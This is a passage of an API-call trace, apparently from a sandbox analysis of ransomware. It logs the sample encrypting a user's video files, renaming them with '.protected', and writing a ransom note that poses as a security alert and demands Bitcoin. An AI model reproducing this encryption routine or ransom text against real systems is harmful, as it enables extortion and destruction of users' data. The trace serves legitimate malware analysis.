[0092.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4.protected") returned 79 [0092.933] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4.protected")) returned 1 [0092.934] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Windows") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Program Files") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Program Files (x86)") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="$Recycle.bin") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="System Volume Information") returned 1 [0092.934] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.934] StrStrIW (lpFirst="X phn.mp4", lpSrch=".protected") returned 0x0 [0092.934] lstrcmpW (lpString1="X phn.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0092.934] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".txt") returned 0x0 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".rar") returned 0x0 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".zip") returned 0x0 [0092.935] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.936] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.937] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.937] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.937] CloseHandle (hObject=0xd4) returned 1 [0092.937] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4.protected") returned 69 [0092.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4.protected")) returned 1 [0092.938] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Windows") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Program Files") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Program Files (x86)") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="$Recycle.bin") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="System Volume Information") returned 1 [0092.938] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.938] StrStrIW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".protected") returned 0x0 [0092.938] lstrcmpW (lpString1="xA 5w3mu0QO.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0092.938] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.938] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".txt") returned 0x0 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".rar") returned 0x0 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".zip") returned 0x0 [0092.939] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.940] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.941] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.941] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.941] CloseHandle (hObject=0xd4) returned 1 [0092.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4.protected") returned 75 [0092.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4.protected")) returned 1 [0092.942] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.942] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.942] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\RESTORE_FILES.txt") returned 67 [0092.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.943] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.943] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.944] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.944] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.944] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.944] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.944] CloseHandle (hObject=0xb4) returned 1 [0092.945] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="System Volume Information") returned -1 [0092.945] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD") returned 51 [0092.945] lstrcmpW (lpString1="ngZxA0y_ZD", lpString2=".") returned 1 [0092.945] lstrcmpW (lpString1="ngZxA0y_ZD", lpString2="..") returned 1 [0092.945] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\*") returned 53 [0092.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.945] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.945] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\.") returned 53 [0092.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.945] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.946] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\..") returned 54 [0092.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.946] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Windows") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Program Files") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Program Files (x86)") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="$Recycle.bin") returned 1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="System Volume Information") returned -1 [0092.946] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.946] StrStrIW (lpFirst="f-xM.mp4", lpSrch=".protected") returned 0x0 [0092.946] lstrcmpW (lpString1="f-xM.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".txt") returned 0x0 [0092.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".rar") returned 0x0 [0092.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".zip") returned 0x0 [0092.947] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.948] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.948] CloseHandle (hObject=0xd4) returned 1 [0092.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4.protected") returned 70 [0092.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4.protected")) returned 1 [0093.025] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Windows") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Program Files") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="Program Files (x86)") returned -1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="$Recycle.bin") returned 1 [0093.025] lstrcmpiW (lpString1="mZNTmLBNO.avi", lpString2="System Volume Information") returned -1 [0093.025] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.025] StrStrIW (lpFirst="mZNTmLBNO.avi", lpSrch=".protected") returned 0x0 [0093.025] lstrcmpW (lpString1="mZNTmLBNO.avi", lpString2="RESTORE_FILES.txt") returned -1 [0093.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".txt") returned 0x0 [0093.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".rar") returned 0x0 [0093.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi") returned 65 [0093.026] StrStrW (lpFirst="mZNTmLBNO.avi", lpSrch=".zip") returned 0x0 [0093.026] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.026] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.026] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.027] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.027] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0093.027] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0093.027] CloseHandle (hObject=0xd4) returned 1 [0093.028] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi.protected") returned 75 [0093.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\mZNTmLBNO.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\mzntmlbno.avi.protected")) returned 1 [0093.029] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Windows") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Program Files") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="Program Files (x86)") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1="wljq", lpString2="System Volume Information") returned 1 [0093.029] 